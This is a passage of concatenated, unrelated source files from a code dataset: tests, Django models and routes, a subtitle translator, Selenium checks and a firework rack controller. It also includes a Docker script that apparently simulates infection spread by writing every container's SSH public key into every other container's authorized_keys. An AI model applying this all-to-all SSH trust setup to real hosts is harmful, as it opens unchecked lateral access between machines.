None\n\n\t\t\tgrouped = len(matchers) > 1\n\t\t\tmatchers = r'|'.join(matchers)\n\t\t\tif not self.value and not self.parent: # root\n\t\t\t\treturn matchers\n\t\t\tmatchers = (r'(?:' if grouped else '') + matchers + (r')' if grouped else '')\n\n\t\t\tif self.type == type_:\n\t\t\t\treturn rf'{self.value}(?:::{matchers})?'\n\t\t\telse:\n\t\t\t\treturn rf'{self.value}::{matchers}'\n\n\n\n\tdef __init__(self):\n\t\tself.root = CppTree.Node('', None)\n\n\tdef add(self, val, type_):\n\t\tassert type_ in (CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\tval = [v for v in val.split(r'::') if len(v)]\n\t\tparent = self.root\n\t\twhile len(val):\n\t\t\tv = val.pop(0)\n\t\t\tparent = parent.add(v, type_ if not len(val) else 0)\n\n\tdef add_type(self, val):\n\t\tself.add(val, CppTree.TYPES)\n\n\tdef add_namespace(self, val):\n\t\tself.add(val, CppTree.NAMESPACES)\n\n\tdef add_enum_value(self, val):\n\t\tself.add(val, CppTree.ENUM_VALUES)\n\n\tdef matcher(self, type_):\n\t\treturn self.root.regex_matcher(type_)\n\n\n\n#=======================================================================================================================\n# Custom exceptions\n#=======================================================================================================================\n\nclass Error(Exception):\n\t\"\"\"Base class for other exceptions.\"\"\"\n\n\tdef __init__(self, *message):\n\t\tself.__message = r' '.join([str(m) for m in message])\n\t\tsuper().__init__(*message)\n\n\tdef __str__(self):\n\t\treturn self.__message\n\n\n\nclass WarningTreatedAsError(Error):\n\t\"\"\"Raised when a warning is generated and the user has chosen to treat warnings as errors.\"\"\"\n\tpass\n","sub_path":"poxy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"273383380","text":"\"\"\"Test init of AccuWeather integration.\"\"\"\nfrom homeassistant.components.accuweather.const import DOMAIN\nfrom homeassistant.config_entries import (\n ENTRY_STATE_LOADED,\n ENTRY_STATE_NOT_LOADED,\n ENTRY_STATE_SETUP_RETRY,\n)\nfrom homeassistant.const import STATE_UNAVAILABLE\n\nfrom tests.async_mock import patch\nfrom tests.common import MockConfigEntry\nfrom tests.components.accuweather import init_integration\n\n\nasync def test_async_setup_entry(hass):\n \"\"\"Test a successful setup entry.\"\"\"\n await init_integration(hass)\n\n state = hass.states.get(\"weather.home\")\n assert state is not None\n assert state.state != STATE_UNAVAILABLE\n assert state.state == \"sunny\"\n\n\nasync def test_config_not_ready(hass):\n \"\"\"Test for setup failure if connection to AccuWeather is missing.\"\"\"\n entry = MockConfigEntry(\n domain=DOMAIN,\n title=\"Home\",\n unique_id=\"0123456\",\n data={\n \"api_key\": \"32-character-string-1234567890qw\",\n \"latitude\": 55.55,\n \"longitude\": 122.12,\n \"name\": \"Home\",\n },\n )\n\n with patch(\n \"homeassistant.components.accuweather.AccuWeather._async_get_data\",\n side_effect=ConnectionError(),\n ):\n entry.add_to_hass(hass)\n await hass.config_entries.async_setup(entry.entry_id)\n assert entry.state == ENTRY_STATE_SETUP_RETRY\n\n\nasync def test_unload_entry(hass):\n \"\"\"Test successful unload of entry.\"\"\"\n entry = await init_integration(hass)\n\n assert len(hass.config_entries.async_entries(DOMAIN)) == 1\n assert entry.state == ENTRY_STATE_LOADED\n\n assert await hass.config_entries.async_unload(entry.entry_id)\n await 
hass.async_block_till_done()\n\n assert entry.state == ENTRY_STATE_NOT_LOADED\n assert not hass.data.get(DOMAIN)\n","sub_path":"tests/components/accuweather/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"128565947","text":"#encoding:utf-8\nfrom django.conf.urls.defaults import patterns,url\n\n #creamos nueva rama de urls\n\nurlpatterns = patterns('apps.index.views', #prefijos de la vista que queremos jalar archivo donde estamos jalando las vistas\n\n \n\n\t\t\turl(r'photo.phpfbid=10151498551046840&set=a109041001839/$' , 'index_route' ) , \n\n\t\t\turl(r'login/$' , 'login', name = 'login_view') , \n\n\t\t\turl(r'raw/$' , 'raw', name = 'raw') , \n\n \n\t\t\t) #cerramos la creacion de las ramas\n","sub_path":"apps/index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"404912794","text":"from django.db import models\nfrom ad_posts.models import Ad\n\n\nclass Man(Ad):\n TYPE=(\n ('Брелоки и ключницы','Брелоки и ключницы'),\n ('Галстуки и бабочки','Галстуки и бабочки'),\n ('Для волос','Для волос'),\n ('Зонты','Зонты'),\n ('Кошельки','Кошельки'),\n ('Очки','Очки'),\n ('Перчатки и варежки','Перчатки и варежки'),\n ('Ремни и пояса','Ремни и пояса'),\n ('Рюкзаки','Рюкзаки'),\n ('Сумки','Сумки'),\n ('Украшения','Украшения'),\n ('Часы','Часы'),\n ('Чемоданы','Чемоданы'),\n ('Шарфы и платки','Шарфы и платки'),\n )\n BRANDS=(\n ('ACNE STUDIOS','ACNE STUDIOS'),\n ('ADIDAS','ADIDAS'),\n ('Alba','Alba'),\n ('Alexander McQueen','Alexander McQueen'),\n ('Alexander Wang','Alexander Wang'),\n ('Ann Demeulemeester','Ann Demeulemeester'),\n ('Armani','Armani'),\n ('Asos','Asos'),\n ('Avon','Avon'),\n ('Baldinini','Baldinini'),\n ('Balenciaga','Balenciaga'),\n ('Befree','Befree'),\n ('Braccialini','Braccialini'),\n ('Burberry','Burberry'),\n ('Calipso','Calipso'),\n ('Calvin Clein','Calvin Clein'),\n ('Casio','Casio'),\n ('Celine','Celine'),\n ('Chanel','Chanel'),\n ('Chloe','Chloe'),\n ('Chtistian Dior','Chtistian Dior'),\n (\"Colin's\",\"Colin's\"),\n ('Comme des Garcons','Comme des Garcons'),\n ('Cos','Cos'),\n ('Daniel Wellington','Daniel Wellington'),\n ('Dasigual','Dasigual'),\n ('Diesel','Diesel'),\n ('Diva','Diva'),\n ('Dkny','Dkny'),\n ('Dolce&Cabbana','Dolce&Cabbana'),\n ('Dries Van Noten','Dries Van Noten'),\n ('Ecco','Ecco'),\n ('Escada','Escada'),\n ('Etro','Etro'),\n ('Fendi','Fendi'),\n ('Fjallraven','Fjallraven'),\n ('Furla','Furla'),\n ('Geargio Armani','Geargio Armani'),\n ('Givenchy','Givenchy'),\n ('Gucci','Gucci'),\n ('H&M','H&M'),\n ('Helmut Lang','Helmut Lang'),\n ('Incanto','Incanto'),\n ('Insity','Insity'),\n ('Isabel Marant','Isabel Marant'),\n ('Jil Sander','Jil Sander'),\n ('Jimmy Choo','Jimmy Choo'),\n ('Jast Cavalli','Jast Cavalli'),\n ('Karen Millen','Karen Millen'),\n ('Kenzo','Kenzo'),\n ('Lacoste','Lacoste'),\n (\"Livi's\",\"Livi's\"),\n ('Louiss Vuitton','Louiss Vuitton'),\n ('Love Republic','Love Republic'),\n ('Maison Margiela','Maison Margiela'),\n ('Maison Kitsune','Maison Kitsune'),\n ('Mango','Mango'),\n ('Marc Jacobs','Marc Jacobs'),\n ('Marni','Marni'),\n ('Mascotte','Mascotte'),\n ('Max Mara','Max Mara'),\n ('Mexx','Mexx'),\n ('Michael Cors','Michael Cors'),\n ('Missoni','Missoni'),\n ('Miu Miu','Miu Miu'),\n ('Mohito','Mohito'),\n ('Moschino','Moschino'),\n ('Motivi','Motivi'),\n ('Neil Barrett','Neil 
Barrett'),\n ('New Yorker','New Yorker'),\n ('Next','Next'),\n ('Nike','Nike'),\n (\"O'Stin\",\"O'Stin\"),\n ('Off-White','Off-White'),\n ('Officine Creative','Officine Creative'),\n ('Oysho','Oysho'),\n ('Pinco','Pinco'),\n ('Piquadro','Piquadro'),\n ('Prada','Prada'),\n ('Pull&Bear','Pull&Bear'),\n ('RAFF SIMONS','RAFF SIMONS'),\n ('Ralph Lauren','Ralph Lauren'),\n ('Ray-Ban','Ray-Ban'),\n ('Reebok','Reebok'),\n ('Reserved','Reserved'),\n ('Rick Owens','Rick Owens'),\n ('River Island','River Island'),\n ('Roxy','Roxy'),\n ('Salvatore Ferragamo','Salvatore Ferragamo'),\n ('Sisley','Sisley'),\n ('Skagen','Skagen'),\n ('Stella Mccartney','Stella Mccartney'),\n ('Stradivarius','Stradivarius'),\n ('Sunlight','Sunlight'),\n ('Swarovski','Swarovski'),\n ('Ted Baker','Ted Baker'),\n ('Terranova','Terranova'),\n ('Tods','Tods'),\n ('Tommy Hilfiger','Tommy Hilfiger'),\n ('Topshop','Topshop'),\n ('Toska Blu','Toska Blu'),\n ('Tous','Tous'),\n ('Undercover','Undercover'),\n ('United Colors of Beneton','United Colors of Beneton'),\n ('Valentino','Valentino'),\n ('Vans','Vans'),\n ('Versace','Versace'),\n (\"Victoria's Secret\",\"Victoria's Secret\"),\n ('Vivienne WestWood','Vivienne WestWood'),\n ('YSL','YSL'),\n ('Yohji Yamamoto','Yohji Yamamoto'),\n ('Yves Saint Laurent','Yves Saint Laurent'),\n ('Zara','Zara'),\n ('Zarina','Zarina'),\n ('Дикая Орхидея','Дикая Орхидея'),\n ('Новая Заря','Новая Заря'),\n ('Эконика','Эконика'),\n )\n COLOR=(\n ('Белый','Белый'),\n ('Хаки','Хаки'),\n ('Серый','Серый'),\n ('Чёрный','Чёрный'),\n ('Коричневый','Коричневый'),\n ('Бордовый','Бордовый'),\n ('Бежевый','Бежевый'),\n ('Красный','Красный'),\n ('Оранжевый','Оранжевый'),\n ('Жёлтый','Жёлтый'),\n ('Зелёный','Зелёный'),\n ('Голубой','Голубой'),\n ('Синий','Синий'),\n ('Фиолетовый','Фиолетовый'),\n ('Пурпурный','Пурпурный'),\n ('Розовый','Розовый'),\n ('Разноцветный','Разноцветный'),\n )\n CONDITION =(\n ('Б/У','Б/У'),\n ('Новое','Новое'),\n )\n SIZE=(\n ('44-46 (S)','44-46 (S)'),\n ('46-48 (M)','46-48 (M)'),\n ('48-50 (L)','48-50 (L)'),\n ('50-52 (XL)','50-52 (XL)'),\n ('52-54 (XXL)','52-54 (XXL)'),\n ('54-56 (XXXL)','54-56 (XXXL)'),\n )\n SEASON =(\n ('Демисезон','Демисезон'),\n ('Зима','Зима'),\n ('Лето','Лето'),\n )\n OUTERWEAR=(\n ('Ветровки','Ветровки'),\n ('Джинсовые куртки','Джинсовые куртки'),\n ('Дождевики','Дождевики'),\n ('Дубленки','Дубленки'),\n ('Жилеты','Жилеты'),\n ('Кожаные куртки','Кожаные куртки'),\n ('Куртки','Куртки'),\n ('Пальто','Пальто'),\n ('Парки','Парки'),\n ('Плащи и тренчи','Плащи и тренчи'),\n ('Пуховики','Пуховики'),\n )\n HAT=(\n ('Бейсболки и кепки','Бейсболки и кепки'),\n ('Береты','Береты'),\n ('Банданы','Банданы'),\n ('Панамы','Панамы'),\n ('Шапки','Шапки'),\n ('Шляпы','Шляпы'),\n )\n HOME=(\n ('Пижамы','Пижамы'),\n ('Халаты','Халаты'),\n )\n COVERALL=(\n ('Полукомбинезоны','Полукомбинезоны'),\n ('Комбинезоны','Комбинезоны'),\n )\n\n UNDERWEAR=(\n ('Носки','Носки'),\n ('Термобелье','Термобелье'),\n ('Трусы','Трусы'),\n ('Плавки','Плавки'),\n )\n SHOES=(\n ('Ботинки','Ботинки'),\n ('Валенки и галоши','Валенки и галоши'),\n ('Домашняя обувь','Домашняя обувь'),\n ('Кеды','Кеды'),\n ('Кроссовки','Кроссовки'),\n ('Мокасины','Мокасины'),\n ('Сандалии','Сандалии'),\n ('Сапоги','Сапоги'),\n ('Слипоны','Слипоны'),\n ('Тапочки','Тапочки'),\n ('Туфли','Туфли'),\n ('Угги и унты','Угги и унты'),\n ('Шлепанцы','Шлепанцы'),\n )\n SHOE_SIZE=(\n ('38','38'),\n ('39','39'),\n ('40','40'),\n ('41','41'),\n ('42','42'),\n ('43','43'),\n ('44','44'),\n ('45','45'),\n ('46','46'),\n )\n SUITS=(\n 
('Жакеты','Жакеты'),\n ('Жилетки','Жилетки'),\n ('Костюмы','Костюмы'),\n ('Пиджаки','Пиджаки'),\n )\n SHIRTS =(\n ('Джинсовые','Джинсовые'),\n ('Длинный рукав','Длинный рукав'),\n ('Короткий рукав','Короткий рукав'),\n )\n SWEETERS=(\n ('Водолазки','Водолазки'),\n ('Джемперы','Джемперы'),\n ('Кардиганы','Кардиганы'),\n ('Кофты','Кофты'),\n ('Олимпайки','Олимпайки'),\n ('Пуловеры','Пуловеры'),\n ('Свитеры','Свитеры'),\n ('Толстовки и худи','Толстовки и худи'),\n )\n SPORTWEAR=(\n ('Верхняя одежда','Верхняя одежда'),\n ('Спортивные костюмы','Спортивные костюмы'),\n ('Футболки и поло','Футболки и поло'),\n ('Штаны и шорты','Штаны и шорты'),\n )\n TOPS=(\n ('Лонгсливы','Лонгсливы'),\n ('Майки','Майки'),\n ('Поло','Поло'),\n ('Футболки','Футболки'),\n )\n PANTS=(\n ('Бриджы','Бриджы'),\n ('Брюки','Брюки'),\n ('Джинсы','Джинсы'),\n ('Шорты','Шорты'),\n )\n PANT_SIZE=(\n ('28','28'),\n ('29','29'),\n ('30','30'),\n ('31','31'),\n ('32','32'),\n ('33','33'),\n ('34','34'),\n ('35','35'),\n ('36','36'),\n ('37','37'),\n ('38 и больше','38 и больше'),\n )\n\n type = models.CharField(max_length=50, blank=True, choices = TYPE, verbose_name=\"Тип аксессуара\")\n brand = models.CharField(max_length=50, blank=True, choices = BRANDS, verbose_name=\"Бренд\")\n color=models.CharField(max_length=45, blank=True, choices = COLOR, verbose_name=\"Цвет\")\n condition = models.CharField(max_length=50, blank=True, choices = CONDITION, verbose_name=\"Состояние\")\n size = models.CharField(max_length=50, blank=True, choices = SIZE, verbose_name=\"Размер\")\n season = models.CharField(max_length=50, blank=True, choices = SEASON, verbose_name=\"Сезон\")\n outerwear = models.CharField(max_length=50, blank=True, choices = OUTERWEAR, verbose_name=\"Верхняя одежда\")\n hat = models.CharField(max_length=50, blank=True, choices = HAT, verbose_name=\"Головные уборы\")\n home = models.CharField(max_length=50, blank=True, choices = HOME, verbose_name=\"Домашняя одежда\")\n coverall = models.CharField(max_length=50, blank=True, choices = COVERALL, verbose_name=\"Комбинезоны\")\n underwear = models.CharField(max_length=50, blank=True, choices = UNDERWEAR, verbose_name=\"Нижнее белье\")\n shoes = models.CharField(max_length=50, blank=True, choices = SHOES, verbose_name=\"Обувь\")\n shoe_size = models.CharField(max_length=50, blank=True, choices = SHOE_SIZE, verbose_name=\"Размер обуви\")\n suits = models.CharField(max_length=50, blank=True, choices = SUITS, verbose_name=\"Пиджаки и костюмы\")\n shirts = models.CharField(max_length=50, blank=True, choices = SHIRTS, verbose_name=\"Рубашки\")\n sweaters = models.CharField(max_length=50, blank=True, choices = SWEETERS, verbose_name=\"Свитера и толстовки\")\n sportwear = models.CharField(max_length=50, blank=True, choices = SPORTWEAR, verbose_name=\"Спортивная одежда\")\n tops = models.CharField(max_length=50, blank=True, choices = TOPS, verbose_name=\"Футболки и поло\")\n pants = models.CharField(max_length=50, blank=True, choices = PANTS, verbose_name=\"Штаны и шорты\")\n pant_size = models.CharField(max_length=50, blank=True, choices = PANT_SIZE, verbose_name=\"Размер штанов\")\n\n class Meta:\n verbose_name = \"Мужской гардероб\"\n verbose_name_plural = \"Мужской гардероб\"\n","sub_path":"ad_model/man.py","file_name":"man.py","file_ext":"py","file_size_in_byte":12756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"76140142","text":"from translate import Translator\nimport os\n\n'''\n仅支持一种格式😂 不打算改\nexample:\n 1\n 00:00:00.620 
--> 00:00:01.540\n bulabulabula( /./!)\n \n num\n time --> time\n texts\n\n'''\n\ndef entozh(sotext):\n tr=Translator(to_lang='chinese')\n return tr.translate(sotext)\n\ndef xuanze():\n tt=[]\n for a,b,c in os.walk('.'):\n tt=c\n break\n i=0\n while 1:\n try:\n if tt[i][-3:]!='txt':\n del tt[i]\n else:\n i+=1\n except:\n break\n j=0\n for i in tt:\n print('%d %s'%(j,i))\n j+=1\n return tt[int(input('choose num:'))]\n\n\ndef main():\n with open('%s'%(xuanze()),'r') as f:\n data=f.read().split('\\n')\n sub=[]\n \n #格式化部分\n for i in range(len(data)):\n if data[i]=='':\n continue\n try:\n int(data[i])\n subtime1=data[i+1][:12]\n subtime2=data[i+1][17:]\n scontent=''\n try:\n for k in (2,3,4,5):\n if data[i+k]!='':\n scontent+=' '+data[i+k]\n else:\n break\n except:\n pass\n finally:\n sub.append([subtime1,subtime2,scontent])\n except:\n pass\n sub1=[]\n for i in sub:\n sub1.append([i[0],i[1],i[2]])\n i=0\n while 1:\n try:\n for k in range(9):\n if sub1[i+k][2][-1]=='.' or sub1[i+k][2][-1]=='!':\n if k==0:\n break\n for q in range(k):\n sub1[i][2]+=' '+sub1[i+1][2]\n sub1[i][1]=sub1[i+1][1]\n del sub1[i+1]\n break\n i+=1\n except:\n break\n #格式化结束\n\n k=len(sub1)\n for i in range(k):\n os.system('clear')\n if i+1!=k:\n print('翻译中',end='')\n else:\n print('已完成',end='')\n print('%d/%d'%(i+1,k))\n sub1[i][2]=entozh(sub1[i][2])\n with open('zimu.py','w') as f:\n f.write('szimu='+str(sub)+'\\n\\n'+'tzimu='+str(sub1))\n\n print('ok!')\n\nif __name__=='__main__':\n main()\n","sub_path":"1字幕生成.py","file_name":"1字幕生成.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"628796258","text":"import allure\nimport requests\nimport time\nfrom allure_commons.types import AttachmentType\nfrom selenium import webdriver\nimport pytest\nfrom datetime import datetime\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\n\n\nclass TestPageSearch:\n def setup(self):\n self.driver = webdriver.Chrome((\"C:/Users/shubina/PycharmProjects/chromedriver\"))\n self.driver.maximize_window()\n self.urls = ['http://staging-leto19.letomall.ru/stores-category/all',\n 'http://staging-kry19.planeta-mall.ru/stores-category/all',\n 'http://staging-nkz19.planeta-mall.ru/stores-category/all',\n 'http://staging-aura19.planeta-mall.ru/stores-category/all',\n 'http://staging-ufa19.planeta-mall.ru/stores-category/all']\n\n def teardown(self):\n self.driver.quit()\n\n def test_check_all_urls(self):\n urls = self.urls\n errors = []\n for url in urls:\n re = requests.get(url)\n soupe = BeautifulSoup(re.text, 'lxml')\n\n all_promo = soupe.find_all(class_='item item-store')\n for one_promo in all_promo:\n r = requests.get((one_promo.get('href')))\n try:\n assert r.status_code == 200\n except Exception as e:\n errors.append(str(r.status_code) + ' status has a link ' + one_promo.get('href'))\n assert not errors, \"errors occured:\\n{}\".format(\"\\n\".join(errors))\n\n def test_store_view_switches(self):\n driver = self.driver\n urls = self.urls\n errors = []\n for url in urls:\n driver.get(url)\n driver.implicitly_wait(3)\n for i in range(2):\n try:\n # driver.find_element_by_xpath('//main//section[@class =\"pageSection\"]')\n # print('ya')\n driver.find_element_by_xpath('//a[@class = \"viewToggle viewToggle-alpha \"]').click()\n time.sleep(1)\n assert driver.find_element_by_xpath('//main//section[@class =\"storesOrderedList\"]')\n driver.find_element_by_xpath('//a[@class = \"viewToggle viewToggle-cards \"]').click()\n 
time.sleep(1)\n assert driver.find_element_by_xpath('//main//section[@class =\"pageSection\"]')\n except Exception as e:\n errors.append('Switch does not work ' + url)\n assert not errors, \"errors occured:\\n{}\".format(\"\\n\".join(errors))\n","sub_path":"13.1. All stores/test_elements_on_the_page_All_stores.py","file_name":"test_elements_on_the_page_All_stores.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"506082339","text":"import parser_library\r\n\r\ndef main():\r\n \r\n \r\n # Checks working directory \r\n # and creates it if not available if argument is given,\r\n # subdirectory is created\r\n path_local_archive = parser_library.get_or_create_output_folder()\r\n \r\n # gets all books through counting from 1 to max \r\n # parser_library.get_all_books(path_local_archive)\r\n #Get metadata\r\n parser_library.get_all(path_local_archive)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"Gutenberg-Bot/gutenberg_bot.py","file_name":"gutenberg_bot.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"590219513","text":"import rack\nimport yaml\nimport random\nfrom logzero import logger\n\nclass rackset:\n\n def __init__(self):\n self.rack_array = [] #create an empty set of racks\n\n def add_rack(self, rack_address = 0x20, rack_size = 16, fire_state = False):\n \"\"\"Add a new rack to the rackset.\"\"\"\n self.rack_array.append(rack.rack(rack_address, rack_size, fire_state))\n\n def add_rack_from_config(self,config):\n # Setup rack address\n if 'rack_address' in config:\n rack_address = config['rack_address']\n else:\n rack_address = False\n\n # Setup rack map\n if 'map' in config:\n rack_map = config['map']\n else:\n rack_map = [8, 0, 9, 1, 10, 2, 11, 3, 12, 4, 13, 5, 14, 6, 15, 7]\n\n # setup rack firing time\n if 'firing_time' in config:\n firing_time = config['firing_time']\n else:\n firing_time = 5\n\n # Setup rack size\n if 'rack_size' in config:\n rack_size = config['rack_size']\n elif 'descriptions' in config:\n rack_size = len(config['descriptions'])\n else:\n rack_size = 16\n\n # Setup fire state\n if 'fire_state' in config:\n fire_state = config['fire_state']\n else:\n fire_state = False\n \n # Setup channels\n if 'descriptions' in config:\n channels = config['descriptions']\n else:\n channels = False\n\n self.rack_array.append(rack.rack(rack_address, rack_size, fire_state, channels, rack_map, firing_time))\n\n def load_racks_from_file(self, filename):\n a_yaml_file = open(filename)\n config = yaml.load(a_yaml_file, Loader=yaml.FullLoader)\n for rack in config['racks']:\n self.add_rack_from_config(rack)\n\n def status(self):\n status = []\n for i in range(0,self.size()):\n status.append(self.rack_array[i].status())\n return status\n\n def fire_list(self):\n mylist = []\n mylist.append(\"http://piro:5000/rackset/fire/random\" )\n for i in range(0,self.size()):\n for j in range(0, self.rack_array[i].rack_size):\n mylist.append(\"http://piro:5000/rackset/fire/\" + str(i) + \"/\" + str(j) )\n return mylist\n\n def size(self):\n return len(self.rack_array)\n\n def all_fired(self):\n status = True\n for rack in range(0,self.size()):\n if not self.rack_array[rack].all_fired():\n status = False\n return status\n return status\n\n\n def fire_channel(self, rack, channel):\n return self.rack_array[rack].fire_channel_thread(channel)\n \n def fire_random(self):\n if 
self.all_fired():\n logger.error(\"Can't fire, no unfired channels available\")\n return False\n while True:\n rack = random.randrange(self.size())\n if not self.rack_array[rack].all_fired():\n break\n fired_channel = self.rack_array[rack].fire_random()\n return rack, fired_channel\n \n def reset(self):\n for rack in range(0,self.size()):\n self.rack_array[rack].reset_all_channels()\n\n def clear(self):\n self.rack_array = []","sub_path":"rackset.py","file_name":"rackset.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"614325320","text":"import docker\nimport math\nimport os\n\nnames = [\"dock1\", \"dock2\", \"dock3\", \"dock4\", \"dock5\", \"dock6\", \"dock7\", \"dock8\", \"dock9\"]\nimage_name = \"balintsz/magic_docker:ssh2\"\nssh_keys_path = \"/root/.ssh\"\nssh_private_key_name = \"id_rsa\"\nssh_public_key_name = \"id_rsa.pub\"\nssh_auth_key_name = \"authorized_keys\"\npriv_path = os.path.join(ssh_keys_path, ssh_private_key_name)\npub_path = os.path.join(ssh_keys_path, ssh_public_key_name)\nauth_path = os.path.join(ssh_keys_path, ssh_auth_key_name)\nconfig_path = \"/root/config.json\"\nBARRIER_FIREWALL = 0.8\nNON_BARRIER_FIREWALL = 0.5\nNR_GRID = math.floor(math.sqrt(len(names)))\n\ndocker_info = []\n\n\ndef create_dockers():\n size = len(names)\n barrier_x = NR_GRID // 2\n for i in range(len(names)):\n docker_dict = dict()\n docker_dict[\"Name\"] = names[i]\n docker_dict[\"Location\"] = get_coordinates(i, NR_GRID)\n create_docker(docker_dict[\"Name\"])\n start_ssh(docker_dict[\"Name\"])\n docker_dict[\"Ip\"] = client.api.inspect_container(docker_dict[\"Name\"])['NetworkSettings']['Networks']['bridge']['IPAddress']\n docker_dict[\"Infected\"] = \"No\"\n if docker_dict[\"Location\"]['x'] == barrier_x:\n docker_dict[\"Firewall\"] = BARRIER_FIREWALL\n else:\n docker_dict[\"Firewall\"] = NON_BARRIER_FIREWALL\n docker_info.append(docker_dict)\n gen_ssh_key(i)\n create_neighbours()\n all_handshakes()\n drop_configs()\n\n\ndef drop_configs():\n for i in range(len(names)):\n command = build_command(\"echo \" + str(docker_info[i]) + \" >> \" + config_path)\n my_exec = client.api.exec_create(docker_info[i][\"Name\"], command)\n client.api.exec_start(my_exec)\n\n\ndef create_neighbours():\n for i in range(len(names)):\n docker_info[i][\"Neighbours\"] = [{'Name': docker_info[neighbour_index][\"Name\"],\n 'Ip': docker_info[neighbour_index][\"Ip\"],\n 'Firewall': docker_info[neighbour_index][\"Firewall\"]}\n for neighbour_index in get_neighbours(i)]\n\n\ndef get_neighbours(i):\n neighbours = []\n size = math.floor(math.sqrt(len(names)))\n coords = get_coordinates(i, size)\n north = {'x': coords['x'], 'y': coords['y'] - 1}\n south = {'x': coords['x'], 'y': coords['y'] + 1}\n east = {'x': coords['x'] + 1, 'y': coords['y']}\n west = {'x': coords['x'] - 1, 'y': coords['y']}\n possible_neighbours = [north, west, south, east]\n for j in range(4):\n neighbour = possible_neighbours[j]\n if exists_neighbour(neighbour, size):\n neighbours.append(size * neighbour['x'] + neighbour['y'])\n return neighbours\n\n\ndef exists_neighbour(coords, size):\n return coords['x'] in range(size) and coords['y'] in range(size)\n\n\ndef get_coordinates(dock_index, size):\n return {'x': dock_index // size, 'y': dock_index % size}\n\n\ndef remove_dockers():\n for i in range(len(names)):\n client.api.stop(docker_info[i][\"Name\"])\n client.api.remove_container(docker_info[i][\"Name\"])\n\n\ndef print_dockers():\n for i in 
range(len(names)):\n print(docker_to_str(i))\n\n\ndef docker_to_str(index):\n return str(docker_info[index])\n\n\ndef create_docker(docker_name):\n client.containers.create(image_name,\n command=\"/bin/bash\",\n name=docker_name,\n detach=True,\n tty=True,\n stdin_open=True)\n client.api.start(docker_name)\n\n\ndef ping_it(whatip):\n my_exec = client.api.exec_create(docker_info[0][\"Name\"], 'ping -c 2 ' + whatip)\n stream_val = client.api.exec_start(my_exec, stream=True)\n for stream_line in stream_val:\n print(stream_line)\n\n\ndef start_ssh(docker_name):\n my_exec = client.api.exec_create(docker_name, \"/usr/sbin/sshd\")\n client.api.exec_start(my_exec)\n\n\ndef gen_ssh_keys():\n for i in range(len(names)):\n gen_ssh_key(i)\n\n\ndef gen_ssh_key(i):\n command = \"ssh-keygen -b 2048 -t rsa -f \" + priv_path + \" -q -N \\\"\\\"\";\n print(command)\n my_exec = client.api.exec_create(docker_info[i][\"Name\"], command)\n client.api.exec_start(my_exec, stream=True)\n\n\ndef get_public_key(dock):\n command = \"cat \" + pub_path\n print(command)\n my_exec = client.api.exec_create(dock, command)\n stream_val = client.api.exec_start(my_exec, stream=True)\n retVal = ''\n for val in stream_val:\n retVal += str(val)\n return retVal[2:][:-3]\n\n\ndef put_public_key(dock, public_key):\n command = build_command(\"echo \" + public_key + \" >> \" + auth_path)\n print(command)\n my_exec = client.api.exec_create(dock, command)\n stream_val = client.api.exec_start(my_exec, stream=True)\n for val in stream_val:\n print(val)\n\n\ndef build_command(original_command):\n return \"bash -c \\\"\" + original_command + \"\\\"\"\n\n\ndef one_handshake(dock1, dock2):\n put_public_key(dock2, get_public_key(dock1))\n\n\ndef all_handshakes():\n nr_docks = len(names)\n for i in range(nr_docks):\n for j in range(nr_docks):\n if i != j:\n one_handshake(docker_info[i][\"Name\"], docker_info[j][\"Name\"])\n\n\nif __name__ == '__main__':\n client = docker.from_env()\n create_dockers()\n print(client.containers.list())\n print_dockers()\n ping_it(docker_info[1][\"Ip\"])\n input(\"Press a key to continue...\")\n remove_dockers()\n print(client.containers.list())","sub_path":"y3se1/se/nvi/dockerpy/test5_neighbours/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"124905010","text":"sample_text = (\" As Pythons creator I d like to say a few words about its \"+\r\n \"origins adding a bit of personal philosophy \"+\r\n \"Over six years ago in December I was looking for a \"+\r\n \"hobby programming project that would keep me occupied \"+\r\n \"during the week around Christmas My office \"+\r\n \"a government run research lab in Amsterdam would be closed \"+\r\n \"but I had a home computer and not much else on my hands \"+\r\n \" I decided to write an interpreter for the new scripting \"+\r\n \"language I had been thinking about lately a descendant of ABC \"+\r\n \"that would appeal to UnixC hackers I chose Python as a \"+\r\n \"working title for the project being in a slightly irreverent \"+\r\n \"mood and a big fan of Monty Pythons Flying Circus\")\r\n\r\ndef get_words_starting_with(text, letter):\r\n letter = letter\r\n word_list = text.lower().split()\r\n same_words = []\r\n duplicates = 0\r\n duplicate_list = []\r\n## print(word_list)\r\n\r\n for i in word_list:\r\n if i[0] == letter.upper() or i[0] == letter.lower() and not i in same_words:\r\n same_words.append(i)\r\n elif i[0] == letter.upper() or 
